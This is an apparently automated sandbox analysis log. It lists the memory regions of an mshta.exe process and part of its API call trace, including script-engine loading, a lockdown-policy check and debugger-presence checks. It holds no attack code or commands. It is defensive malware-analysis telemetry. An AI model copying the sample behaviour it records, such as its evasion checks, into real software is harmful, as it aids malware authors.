"\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 1029 start_va = 0x71e90000 end_va = 0x71f12fff monitored = 0 entry_point = 0x71eb37c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 1030 start_va = 0x6b030000 end_va = 0x6b04efff monitored = 0 entry_point = 0x6b03c120 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\SysWOW64\\rmclient.dll" (normalized: "c:\\windows\\syswow64\\rmclient.dll") Region: id = 1031 start_va = 0x6cc0000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006cc0000" filename = "" Region: id = 1032 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1033 start_va = 0x6e00000 end_va = 0x6e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1034 start_va = 0x6e40000 end_va = 0x6f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e40000" filename = "" Region: id = 1035 start_va = 0x64fe0000 end_va = 0x65060fff monitored = 0 entry_point = 0x64ffb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1036 start_va = 0x6f40000 end_va = 0x6f40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f40000" filename = "" Region: id = 1037 start_va = 0x6f40000 end_va = 0x733afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f40000" filename = "" Region: id = 1038 start_va = 0x7340000 end_va = 0x7346fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007340000" filename = "" Region: id = 1039 start_va = 0x6c9c0000 end_va = 0x6cd47fff monitored = 1 entry_point = 0x6cb6fd70 region_type = mapped_file name = "jscript9.dll" filename = "\\Windows\\SysWOW64\\jscript9.dll" (normalized: "c:\\windows\\syswow64\\jscript9.dll") Region: id = 1040 start_va = 0x6fe40000 end_va = 0x6fe52fff monitored = 0 entry_point = 0x6fe49950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1041 start_va = 0x6fe10000 end_va = 0x6fe3efff monitored = 0 entry_point = 0x6fe295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1042 start_va = 0x7350000 end_va = 0x736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007350000" filename = "" Region: id = 1043 start_va = 0x7370000 end_va = 0x73affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007370000" filename = "" Region: id = 1044 start_va = 0x73b0000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 1045 start_va = 0x7400000 end_va = 0x741ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 1046 start_va = 0x7420000 end_va = 0x745ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007420000" filename = "" Region: id = 1047 start_va = 0x7460000 end_va = 0x755ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007460000" filename = "" Region: id = 1048 start_va = 0x7560000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007560000" filename = "" Region: id = 1049 start_va = 0x7580000 end_va = 0x759ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 1050 start_va = 0x75a0000 end_va = 0x75bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075a0000" filename = "" Region: id = 1051 start_va = 0x75c0000 end_va = 0x75dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075c0000" filename = "" Region: id = 1052 start_va = 0x75e0000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075e0000" filename = "" Region: id = 1053 start_va = 0x7600000 end_va = 0x761ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 1054 start_va = 0x7620000 end_va = 0x763ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007620000" filename = "" Region: id = 1055 start_va = 0x6ce70000 end_va = 0x6ceb0fff monitored = 0 entry_point = 0x6ce77fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 1056 start_va = 0x720d0000 end_va = 0x722e9fff monitored = 0 entry_point = 0x72165550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 1057 start_va = 0x6cdc0000 end_va = 0x6ce66fff monitored = 0 entry_point = 0x6cdf6240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 1058 start_va = 0x73c50000 end_va = 0x73d1cfff monitored = 0 entry_point = 0x73ca29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 1059 start_va = 0x7640000 end_va = 0x764ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007640000" filename = "" Region: id = 1060 start_va = 0x7640000 end_va = 0x764ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007640000" filename = "" Region: id = 1061 start_va = 0x65d00000 end_va = 0x65d30fff monitored = 0 entry_point = 0x65d122d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 1062 start_va = 0x6d0c0000 end_va = 0x6d54dfff monitored = 0 entry_point = 0x6d44a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 1063 start_va = 0x6cec0000 end_va = 0x6d0b0fff monitored = 0 entry_point = 0x6cfa3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 1064 start_va = 0x6c6a0000 end_va = 0x6c8b7fff monitored = 0 entry_point = 0x6c7497b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 1065 start_va = 0x7640000 end_va = 0x766dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007640000" filename = "" Region: id = 1066 start_va = 0x7670000 end_va = 0x7670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007670000" filename = "" Region: id = 1067 start_va = 0x7680000 end_va = 0x7680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007680000" filename = "" Region: id = 1068 start_va = 0x7690000 end_va = 0x7690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007690000" filename = "" Region: id = 1069 start_va = 0x76a0000 end_va = 0x76dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076a0000" filename = "" Region: id = 1070 start_va = 0x76e0000 end_va = 0x77dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076e0000" filename = "" Region: id = 1071 start_va = 0x77e0000 end_va = 0x7828fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 1072 start_va = 0x7830000 end_va = 0x882ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 1073 start_va = 0x8830000 end_va = 0x902ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 1074 start_va = 0x9030000 end_va = 0x9125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 1075 start_va = 0x9130000 end_va = 0x952ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 1077 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1078 start_va = 0x75e0000 end_va = 0x75e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1079 start_va = 0x65c10000 end_va = 0x65c8efff monitored = 1 entry_point = 0x65c41120 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 1080 start_va = 0x6b040000 end_va = 0x6b04cfff monitored = 0 entry_point = 0x6b0463e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 1081 start_va = 0x65bf0000 end_va = 0x65c05fff monitored = 0 entry_point = 0x65bfe7a0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll") Region: id = 1082 start_va = 0x6bcd0000 end_va = 0x6bcd7fff monitored = 0 entry_point = 0x6bcd17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1083 start_va = 0x9530000 end_va = 0x954ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009530000" filename = "" Region: id = 1084 start_va = 0x9550000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009550000" filename = "" Region: id = 1085 start_va = 0x65a60000 end_va = 0x65bedfff monitored = 0 entry_point = 0x65a838c0 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 1086 start_va = 0x9570000 end_va = 0x963ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 1087 start_va = 0x9640000 end_va = 0x976ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 1088 start_va = 0x9570000 end_va = 0x959ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 1089 start_va = 0x9630000 end_va = 0x963ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 1090 start_va = 0x95a0000 end_va = 0x962ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095a0000" filename = "" Region: id = 1091 start_va = 0x9640000 end_va = 0x974ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 1092 start_va = 0x9760000 end_va = 0x976ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009760000" filename = "" Region: id = 1093 start_va = 0x95a0000 end_va = 0x960ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095a0000" filename = "" Region: id = 1094 start_va = 0x9620000 end_va = 0x962ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009620000" filename = "" Region: id = 1095 start_va = 0x9640000 end_va = 0x96affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 1096 start_va = 0x9740000 end_va = 0x974ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009740000" filename = "" Region: id = 1097 start_va = 0x9770000 end_va = 0x984ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1098 start_va = 0x9850000 end_va = 0x9c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 1099 start_va = 0x75f0000 end_va = 0x75f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 1100 start_va = 0x75e90000 end_va = 0x75eeefff monitored = 0 entry_point = 0x75e94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1101 start_va = 0x70170000 end_va = 0x70181fff monitored = 0 entry_point = 0x70174510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1102 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1103 start_va = 0x700d0000 end_va = 0x7016afff monitored = 0 entry_point = 0x7010f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1104 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1105 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1106 start_va = 0x700c0000 end_va = 0x700c7fff monitored = 0 entry_point = 0x700c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1107 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1108 start_va = 0x6c610000 end_va = 0x6c642fff monitored = 0 entry_point = 0x6c620e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 1109 start_va = 0x6ed00000 end_va = 0x6f898fff monitored = 0 entry_point = 0x6eed6970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 1110 start_va = 0x9570000 end_va = 0x9571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009570000" filename = "" Region: id = 1111 start_va = 0x9590000 end_va = 0x959ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009590000" filename = "" Region: id = 1112 start_va = 0x9580000 end_va = 0x958ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009580000" filename = "" Region: id = 1113 start_va = 0x95a0000 end_va = 0x95dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095a0000" filename = "" Region: id = 1114 start_va = 0x9600000 end_va = 0x960ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009600000" filename = "" Region: id = 1115 start_va = 0x9c50000 end_va = 0x9d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c50000" filename = "" Region: id = 1116 start_va = 0x71960000 end_va = 0x71967fff monitored = 0 entry_point = 0x71961920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1117 start_va = 0x71910000 end_va = 0x71956fff monitored = 0 entry_point = 0x719258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1145 start_va = 0x9d50000 end_va = 0x9ed7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 1146 start_va = 0x9ee0000 end_va = 0x9fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ee0000" filename = "" Region: id = 1147 start_va = 0x95e0000 end_va = 0x95e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1148 start_va = 0x9640000 end_va = 0x965ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 1149 start_va = 0x96a0000 end_va = 0x96affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096a0000" filename = "" Region: id = 1150 start_va = 0x96b0000 end_va = 0x9734fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000096b0000" filename = "" Region: id = 1151 start_va = 0x9fe0000 end_va = 0xa0bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arial.ttf" filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf") Region: id = 1152 start_va = 0x95f0000 end_va = 0x95f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000095f0000" filename = "" Region: id = 1153 start_va = 0x9610000 end_va = 0x9610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009610000" filename = "" Region: id = 1154 start_va = 0x9660000 end_va = 0x966bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "msimgsiz.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat") Region: id = 1155 start_va = 0x9670000 end_va = 0x967ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009670000" filename = "" Region: id = 1156 start_va = 0xa0c0000 end_va = 0xa0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0c0000" filename = "" Region: id = 1157 start_va = 0xa100000 end_va = 0xa1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a100000" filename = "" Region: id = 1158 start_va = 0xa200000 end_va = 0xa2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 1159 start_va = 0x6bdc0000 end_va = 0x6bf32fff monitored = 0 entry_point = 0x6be6d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1162 start_va = 0xa300000 end_va = 0xa3bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 1163 start_va = 0xa3c0000 end_va = 0xa42efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a3c0000" filename = "" Region: id = 1164 start_va = 0xa430000 end_va = 0xa4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a430000" filename = "" Region: id = 1165 start_va = 0x9670000 end_va = 0x967ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009670000" filename = "" Region: id = 1166 start_va = 0x9680000 end_va = 0x968ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009680000" filename = "" Region: id = 1167 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 1168 start_va = 0x9670000 end_va = 0x967ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009670000" filename = "" Region: id = 1169 start_va = 0x9680000 end_va = 0x968ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009680000" filename = "" Region: id = 1170 start_va = 0x9690000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009690000" filename = "" Region: id = 1171 start_va = 0x9690000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009690000" filename = "" Region: id = 1172 start_va = 0x9750000 end_va = 0x975ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009750000" filename = "" Region: id = 1173 start_va = 0x9690000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009690000" filename = "" Region: id = 1174 start_va = 0xa4b0000 end_va = 0xa4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4b0000" filename = "" Region: id = 1175 start_va = 0x9690000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009690000" filename = "" Region: id = 1176 start_va = 0x9030000 end_va = 0x9125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 1177 start_va = 0x95f0000 end_va = 0x95fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000095f0000" filename = "" Thread: id = 30 os_tid = 0xb48 [0129.595] GetStartupInfoA (in: lpStartupInfo=0x19ff14 | out: lpStartupInfo=0x19ff14*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0xa, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0129.596] GetModuleHandleA (lpModuleName=0x0) returned 0xee0000 [0129.596] __set_app_type (_Type=0x2) [0129.596] __p__fmode () returned 0x74344d6c [0129.596] __p__commode () returned 0x74345b1c [0129.596] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xee1b90) returned 0x0 [0129.596] __getmainargs (in: _Argc=0xee3018, _Argv=0xee301c, _Env=0xee3020, _DoWildCard=0, _StartInfo=0xee302c | out: _Argc=0xee3018, _Argv=0xee301c, _Env=0xee3020) returned 0 [0129.603] SetProcessDEPPolicy (dwFlags=0x1) returned 0 [0129.603] InitOnceExecuteOnce (in: InitOnce=0xee33fc, InitFn=0xee1770, Parameter=0x0, Context=0x0 | out: InitOnce=0xee33fc, Parameter=0x0, Context=0x0) returned 1 [0129.603] GetVersionExA (in: lpVersionInformation=0xee3360*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xee3360*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0129.603] GetVersion () returned 0x295a000a [0129.603] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x74530000 [0129.604] GetProcAddress (hModule=0x74530000, lpProcName="HeapSetInformation") returned 0x7454a8e0 [0129.604] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.604] malloc (_Size=0x105) returned 0x8c22f8 [0129.604] malloc (_Size=0x105) returned 0x8c2408 [0129.604] LoadLibraryW (lpLibFileName="WLDP.DLL") returned 0x6b040000 [0129.653] GetProcAddress (hModule=0x6b040000, lpProcName="WldpGetLockdownPolicy") returned 0x6b041ca0 [0129.653] WldpGetLockdownPolicy () returned 0x10000000 [0129.654] FreeLibrary (hLibModule=0x6b040000) returned 1 [0129.658] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x19fee4 | out: phkResult=0x19fee4*=0x156) returned 0x0 [0129.659] RegQueryValueExA (in: hKey=0x156, lpValueName=0x0, lpReserved=0x0, lpType=0x19fedc, lpData=0x8c22f8, lpcbData=0x19fed0*=0x105 | out: lpType=0x19fedc*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x19fed0*=0x1f) returned 0x0 [0129.659] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x6d6d0000 [0129.760] GetProcessHeap () returned 0x5e0000 [0129.760] GetVersion () returned 0x295a000a [0129.761] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x74530000 [0129.761] GetProcAddress (hModule=0x74530000, lpProcName="HeapSetInformation") returned 0x7454a8e0 [0129.761] HeapSetInformation (HeapHandle=0x5e0000, HeapInformationClass=0x0, HeapInformation=0x19fac0, HeapInformationLength=0x4) returned 1 [0129.761] malloc (_Size=0x80) returned 0x8c2518 [0129.762] GetCurrentProcess () returned 0xffffffff [0129.762] GetSystemInfo (in: lpSystemInfo=0x6e898da0 | out: lpSystemInfo=0x6e898da0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0129.762] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0129.762] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0129.762] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0129.762] VerifyVersionInfoW (in: lpVersionInformation=0x19f6c8, dwTypeMask=0x23, dwlConditionMask=0x1801b | out: lpVersionInformation=0x19f6c8) returned 1 [0129.762] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x19f7e8 | out: Buffer=0x0, ReturnedLength=0x19f7e8) returned 0 [0129.763] GetLastError () returned 0x7a [0129.763] GetProcessHeap () returned 0x5e0000 [0129.763] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x5e66c8 [0129.763] GetLogicalProcessorInformation (in: Buffer=0x5e66c8, ReturnedLength=0x19f7e8 | out: Buffer=0x5e66c8, ReturnedLength=0x19f7e8) returned 1 [0129.763] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e66c8 | out: hHeap=0x5e0000) returned 1 [0129.763] GetEnvironmentVariableW (in: lpName="JS_DEBUG_SCOPE", lpBuffer=0x19f7fc, nSize=0x104 | out: lpBuffer="") returned 0x0 [0129.764] IsDebuggerPresent () returned 0 [0129.764] __dllonexit () returned 0x6de63750 [0129.764] __dllonexit () returned 0x6de63760 [0129.764] __dllonexit () returned 0x6de63770 [0129.764] IsDebuggerPresent () returned 0 [0129.765] __dllonexit () returned 0x6de63740 [0129.765] __dllonexit () returned 0x6de63790 [0129.765] GlobalMemoryStatusEx (in: lpBuffer=0x19f9c0 | out: lpBuffer=0x19f9c0) returned 1 [0129.765] __dllonexit () returned 0x6de63670 [0129.765] __dllonexit () returned 0x6de62900 [0129.765] __dllonexit () returned 0x6de62910 